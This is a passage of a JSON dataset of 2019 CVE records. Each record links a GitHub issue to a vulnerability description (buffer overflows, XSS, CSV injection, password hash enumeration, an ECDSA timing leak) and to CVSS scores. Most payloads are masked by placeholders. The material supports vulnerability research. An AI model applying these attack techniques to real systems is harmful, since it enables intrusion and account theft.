        "CVE_ID": "CVE-2019-14296",
        "Issue_Url_old": "https://github.com/upx/upx/issues/287",
        "Issue_Url_new": "https://github.com/upx/upx/issues/287",
        "Repo_new": "upx/upx",
        "Issue_Created_At": "2019-07-19T06:25:38Z",
        "description": "APITAG overflow. APITAG What's the problem (or question)? An issue was discovered in up NUMBERTAG There is a/an buffer overflow in function APITAG at APITAG upx.out l APITAG /dev/null What should have happened? list compressed file Do you have an idea for a solution? check for buffer overflow correctly How can we reproduce the issue? upx.out l APITAG /dev/null source ERRORTAG debug CODETAG bug report ERRORTAG Please tell us details about your environment. UPX version used ( APITAG ): Host Operating System and version: ubuntu NUMBERTAG Host CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz Target Operating System and version: ubuntu NUMBERTAG Target CPU architecture: Intel(R) Core(TM) i NUMBERTAG U CPU NUMBERTAG GHz",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14315",
        "Issue_Url_old": "https://github.com/sunhater/kcfinder/issues/180",
        "Issue_Url_new": "https://github.com/sunhater/kcfinder/issues/180",
        "Repo_new": "sunhater/kcfinder",
        "Issue_Created_At": "2019-07-09T10:35:32Z",
        "description": "Cross site Scripting Vulnerability. I discovered XSS vulnerability in kcfinder version NUMBERTAG test2. Payload > curl PATHTAG );} APITAG APITAG Response ERRORTAG Vulnerable code in file PATHTAG line NUMBERTAG ERRORTAG a var APITAG was not escape by APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14318",
        "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/869",
        "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/869",
        "Repo_new": "weidai11/cryptopp",
        "Issue_Created_At": "2019-07-26T04:49:09Z",
        "description": "ECDSA timing leaks. From a private email by J\u00e1n Jan\u010d\u00e1r: > Message ID NUMBERTAG bd NUMBERTAG e NUMBERTAG e9 c NUMBERTAG EMAILTAG uni.cz> > Subject: Vulnerability disclosure > ... > > During our research into security of elliptic curve cryptography implementations on smart cards and in software libraries NUMBERTAG we have discovered timing leakage in the ECDSA signature generation in the Crypto++ library. > > Vulnerability description > > When performing ECDSA over binary field curves, Crypto++ leaks the bit length of the nonce used in scalar multiplication. It also leaks some other currently unknown information, see the attached plots, specifically the APITAG plot. > > This leakage can be abused if an attacker is able to measure the duration of signing of a few hundreds or thousands of known messages. The attacker can then use a lattice attack based on the Hidden Number Problem NUMBERTAG to reconstruct the private key used, as demonstrated in NUMBERTAG even remotely!). > > See the attached plots and heatmaps for details of the leakage on the standard sect NUMBERTAG r1 curve. based on the level of noise present in the attacker's measurements (the lattice attack is very sensitive to noise) and willingness to trade off computation time, the attack would require from NUMBERTAG to NUMBERTAG k signatures. > > The private key recovery itself, assuming a noise free set of just enough signatures, would then take a few minutes. The leakage is somewhat present in ECDSA over prime field curves as well, but much smaller, I do not know the cause of this NUMBERTAG APITAG URLTAG NUMBERTAG D. Boneh, R. Venkatesan: Hardness of computing the most significant bits of secret keys in Diffie Hellman and related schemes; FILETAG PATHTAG NUMBERTAG B. B. Brumley, N. Tuveri: Remote Timing Attacks are Still Practical; FILETAG >",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-14323",
        "Issue_Url_old": "https://github.com/troglobit/ssdp-responder/issues/1",
        "Issue_Url_new": "https://github.com/troglobit/ssdp-responder/issues/1",
        "Repo_new": "troglobit/ssdp-responder",
        "Issue_Created_At": "2019-07-23T18:26:42Z",
        "description": "Stack based buffer overflow in ssdp_recv. SSDP responder (from version NUMBERTAG up to latest NUMBERTAG incorrectly handles incoming network messages leading to a stack based buffer overwrite by NUMBERTAG byte. This will result in crash of the server, but only when strict stack checking is enabled. Error message WITH Address Sanitizer: sudo ./ssdpd d ssdpd FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14349",
        "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1358",
        "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1358",
        "Repo_new": "espocrm/espocrm",
        "Issue_Created_At": "2019-07-18T13:41:38Z",
        "description": "Stored in XSS in filename. Description APITAG version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in functionality for storing documents in account tab. Attacker can upload specially crafted file, which contains javascript code in its name. Malicious javascript code will be executed when user open page of any profile there is a file with javascript in filename. But this file can be created only on Linux or you can edit field name in local proxy (e.g. Burp Suite) Request ERRORTAG Vulnerable parameters APITAG and name APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14350",
        "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1356",
        "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1356",
        "Repo_new": "espocrm/espocrm",
        "Issue_Created_At": "2019-07-18T13:23:57Z",
        "description": "Stored XSS in Knowledge base. Description Current version of APITAG NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in Knowledge base. Malicious attacker can inject APITAG code in the \"body\" parameter during knowledge base record creation. APITAG contains a link, which will execute javascript code after being clicked. APITAG Make the following request (insert your authentication data and hostname) CODETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14351",
        "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1357",
        "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1357",
        "Repo_new": "espocrm/espocrm",
        "Issue_Created_At": "2019-07-18T13:37:09Z",
        "description": "User password hash enumeration. Description Current version of APITAG NUMBERTAG is vulnerable to user's password hash enumeration. Malicious authenticated attacker can bruteforce user password hash by NUMBERTAG symbol at a time using specially crafted filters. APITAG Make a following request in your browser: APITAG ` If user password hash starts with \"AAAA\" the request will result with information about this user, if not the result will be empty.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14352",
        "Issue_Url_old": "https://github.com/jogetworkflow/jw-community/issues/20",
        "Issue_Url_new": "https://github.com/jogetworkflow/jw-community/issues/20",
        "Repo_new": "jogetworkflow/jw-community",
        "Issue_Created_At": "2019-07-15T23:08:14Z",
        "description": "CSV Injection APITAG NUMBERTAG to High NUMBERTAG Description CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. Details The web application embeds untrusted user input inside the CSV file. In this case a simple formula was used but an attacker can use a malicious formula that might download a file from the internet and have it executed to gain access. The following shows the CSV injection point: APITAG Download the CSV: APITAG Open the CSV file and observe the output: APITAG Impact When a spreadsheet program such as Microsoft Excel or APITAG Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVETAG Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website Exfiltrating contents from the spreadsheet, or other open spreadsheets. Recommendation This attack is difficult to mitigate, and explicitly disallowed from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters: Equals to (\"=\") Plus (\"+\") Minus (\" \") At (\" APITAG References URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14368",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/952",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/952",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-07-12T02:22:41Z",
        "description": "APITAG heap buffer overflow in APITAG Describe the bug in my research , a heap overflow found in APITAG To Reproduce exi NUMBERTAG pr $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14369",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/953",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/953",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-07-12T03:07:03Z",
        "description": "APITAG heap buffer overflow in APITAG APITAG Describe the bug in my research , a heap overflow found in APITAG APITAG APITAG To Reproduce exi NUMBERTAG pv $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14370",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/954",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/954",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2019-07-12T06:36:56Z",
        "description": "heap buffer overflow in APITAG APITAG . Describe the bug in my research , a heap overflow found in APITAG PATHTAG To Reproduce exi NUMBERTAG pv $poc FILETAG Expected behavior ERRORTAG Desktop (please complete the following information): ubuntu NUMBERTAG gcc NUMBERTAG fsanitize=address g",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14373",
        "Issue_Url_old": "https://github.com/FLIF-hub/FLIF/issues/541",
        "Issue_Url_new": "https://github.com/flif-hub/flif/issues/541",
        "Repo_new": "flif-hub/flif",
        "Issue_Created_At": "2019-07-22T02:04:00Z",
        "description": "heap buffer overflow in png_set_text NUMBERTAG in my research in FLIF, a craft file can cause a heap overflow in libpng. I wonder wheather it is the bug with FLIF or libpng. flif overwrite d $poc FILETAG FILETAG asan output ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14379",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2387",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2387",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-07-23T06:28:01Z",
        "description": "A new gadgets to exploit default typing issue in jackson databind. Hey,buddy. I found a new gadgets can be used to exploit jackson which can cause RCE vulnerability. I had sent the report to EMAILTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14431",
        "Issue_Url_old": "https://github.com/matrixssl/matrixssl/issues/30",
        "Issue_Url_new": "https://github.com/matrixssl/matrixssl/issues/30",
        "Repo_new": "matrixssl/matrixssl",
        "Issue_Created_At": "2019-07-23T16:50:11Z",
        "description": "Heap based buffer overflow while parsing DTLS messages APITAG APITAG DTLS server (in all publicly released versions including NUMBERTAG OPEN) incorrectly handles incoming network messages leading to heap buffer overwrite up to NUMBERTAG bytes and possible Remote Code Execution. After processing crafted packet server incorrectly handles fragment length value provided in DTLS message. Proposed CVSS NUMBERTAG score NUMBERTAG APITAG PATHTAG Error message WITHOUT Address Sanitizer: matrixssl NUMBERTAG open$ PATHTAG p NUMBERTAG DTLS server running on port NUMBERTAG Select woke NUMBERTAG Got REQUEST_RECV from APITAG Error in PATHTAG APITAG memory corruption NUMBERTAG cde0 ======= Backtrace: ========= PATHTAG NUMBERTAG e5) FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14439",
        "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2389",
        "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2389",
        "Repo_new": "fasterxml/jackson-databind",
        "Issue_Created_At": "2019-07-24T18:19:41Z",
        "description": "Placeholder for another \"default typing\" CVE. Another reported arrived, wrt logback/JNDI. Need to file an CVE, probably block.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14459",
        "Issue_Url_old": "https://github.com/phaag/nfdump/issues/171",
        "Issue_Url_new": "https://github.com/phaag/nfdump/issues/171",
        "Repo_new": "phaag/nfdump",
        "Issue_Created_At": "2019-07-07T08:29:49Z",
        "description": "Integer overflow in APITAG (ipfix.c) . Hi! I found an integer overflow at function APITAG that can be abused in order to crash the process remotely (denial of service): CODETAG The function uses APITAG as uint NUMBERTAG t which is an unsigned integer (only can holds values between NUMBERTAG and NUMBERTAG so if we have a APITAG with value NUMBERTAG when the substraction at line NUMBERTAG is done ( APITAG ), it will overflow and become NUMBERTAG fffffffd). As this is a value higher than NUMBERTAG the size check made at line NUMBERTAG APITAG ) will be bypassed. At this point we have a huge loop ( APITAG ) where the pointer APITAG will be increased by NUMBERTAG in each iteration until it reaches an invalid memory address and segfaults. I hope this information can be useful. Best regards, Juan Manuel Fernandez",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14464",
        "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/184",
        "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/184",
        "Repo_new": "milkytracker/milkytracker",
        "Issue_Created_At": "2019-07-30T16:54:00Z",
        "description": "Heap based buffer overflow in APITAG Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in APITAG L ERRORTAG . Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14465",
        "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/198",
        "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/198",
        "Repo_new": "schismtracker/schismtracker",
        "Issue_Created_At": "2019-07-30T20:06:50Z",
        "description": "Heap based buffer overflow in the APITAG function. Hi, While fuzzing Schism Tracker with Honggfuzz, I found a heap based buffer overflow in the APITAG function, in mtm.c L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14491",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/15125",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/15125",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2019-07-23T03:32:04Z",
        "description": "out of bounds read in function APITAG . APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler => clang NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG there is an out of bounds read in function APITAG in APITAG which leads to denial of service. source CODETAG debug CODETAG bug report ERRORTAG others from fuzz project pwd opencv classifier NUMBERTAG crash name FILETAG Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. Steps to reproduce commandline classifier PATHTAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.2,
        "impactScore": 4.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14492",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/15124",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/15124",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2019-07-23T03:20:37Z",
        "description": "out of bounds read/write in Function APITAG APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => :ubuntu NUMBERTAG LTS: Compiler => : clang NUMBERTAG Detailed description An issue was discovered in openc NUMBERTAG there is an out of bounds read/write in Function APITAG in APITAG which leads to denial of service. src CODETAG debug CODETAG Steps to reproduce APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14493",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/15127",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/15127",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2019-07-23T03:36:46Z",
        "description": "null pointer dereference in function APITAG . APITAG System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Ubuntu NUMBERTAG LTS Compiler => clang NUMBERTAG Detailed description description An issue was discovered in openc NUMBERTAG There is a null pointer dereference in function APITAG at APITAG NUMBERTAG source ERRORTAG bug report ERRORTAG others from fuzz project pwd opencv classifier NUMBERTAG crash name FILETAG Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. Steps to reproduce commandline classifier PATHTAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-14496",
        "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/183",
        "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/183",
        "Repo_new": "milkytracker/milkytracker",
        "Issue_Created_At": "2019-07-29T18:09:01Z",
        "description": "Stack based buffer overflow in the APITAG function. Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a stack based buffer overflow in APITAG in APITAG L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14497",
        "Issue_Url_old": "https://github.com/milkytracker/MilkyTracker/issues/182",
        "Issue_Url_new": "https://github.com/milkytracker/milkytracker/issues/182",
        "Repo_new": "milkytracker/milkytracker",
        "Issue_Created_At": "2019-07-29T18:06:21Z",
        "description": "Stack based buffer overflow in APITAG Hi, While fuzzing milkytracker with American Fuzzy Lop, I found a stack based buffer overflow in APITAG in APITAG L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-14517",
        "Issue_Url_old": "https://github.com/pandao/editor.md/issues/709",
        "Issue_Url_new": "https://github.com/pandao/editor.md/issues/709",
        "Repo_new": "pandao/editor.md",
        "Issue_Created_At": "2019-07-22T13:23:07Z",
        "description": "XSS Vulnerability in APITAG label. Test Environment Google Chrome Version NUMBERTAG APITAG Build NUMBERTAG bit) Description A malicious actor may insert and finally execute malicious Javascript code. Steps to reproduce NUMBERTAG Go to FILETAG or any open FILETAG apps NUMBERTAG In the edit mode, input the following malicious code snippet: APITAG Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Expected Results No malicious Javascript code should be executed Remediation In general, it is highly recommended to implement input validation, output sanitization and escaping. Proof of Concept FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-14518",
        "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1041",
        "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1041",
        "Repo_new": "evolution-cms/evolution",
        "Issue_Created_At": "2019-03-22T14:11:43Z",
        "description": "Stored Cross Site Scripting. Stored Cross Site Scripting Vulnerability Risk Description Stored cross site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious APITAG code into the application, which will execute within the browser of any user who views the relevant application content. The attacker supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out of band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application). Stored cross site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations, this can be used to create web application worms that spread exponentially and ultimately exploit all active users. POC: Let's see welcome before login FILETAG Login to the Application FILETAG Go to the Template Location and add new template FILETAG add xss payload in description and new category location using APITAG APITAG FILETAG Save and exit the template location will get xss popup FILETAG Mitigation: Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG }",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2019-14518",
        "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1043",
        "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1043",
        "Repo_new": "evolution-cms/evolution",
        "Issue_Created_At": "2019-03-22T15:07:24Z",
        "description": "Reflected XSS Vulnerability. Reflected XSS Vulnerability Description: The second and the most common type of XSS is Reflected XSS APITAG persistent XSS). In this case, the attacker\u2019s payload has to be a part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. Attackers use malicious links, phishing emails, and other social engineering techniques to lure the victim into making a request to the server. The reflected XSS payload is then executed in the user\u2019s browser. Reflected XSS is not a persistent attack, so the attacker needs to deliver the payload to each victim. These attacks are often made using social networks. Login to application FILETAG Goto the Document Manager and view the list of documents FILETAG there is a search perimeter insert xss payload as APITAG APITAG FILETAG Effected URL URLTAG FILETAG Mitigation: Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); 